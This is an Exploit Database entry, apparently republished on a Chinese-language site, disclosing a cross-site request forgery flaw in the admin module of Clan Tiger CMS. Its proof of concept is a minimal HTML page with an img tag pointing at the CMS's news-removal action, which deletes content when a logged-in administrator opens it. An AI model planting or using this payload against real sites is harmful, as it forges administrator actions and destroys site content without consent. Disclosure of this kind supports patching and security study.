Clain_TIger_CMS – Cross-Site Request Forgery

• Exploit Database
• 11 阅读

• 作者： pratul agrawal
  日期： 2010-03-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11780/

• =======================================================================
   
   Clain_TIger_CMS CSRF Vulnerability
   
  =======================================================================
  
  # Vulnerability found in- Admin module
  # email Pratulag@yahoo.com
  # company aksitservices
  # Credit by Pratul Agrawal
  # SoftwareClan Tiger_CMS
  # Category	CMS / Portals
  # Site p4ge http://server/clantiger/index.php?module=login
  # Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
  
   
   
  #Proof of concept #
   
  Targeted URL:http://servername/clantiger/
  
   
   Script to Delete the News content through Cross Site request forgery
   
   .................................................................................................................
   
  <html>
   
  <body>
   
  <img src=http://server/clantiger/index.php?module=news&action=remove&id=[user ID] />
   
  </body>
   
  </html>
   
   ...................................................................................................................
   
   
   
  After execution refresh the page and u can see that a added content is deleted automatically.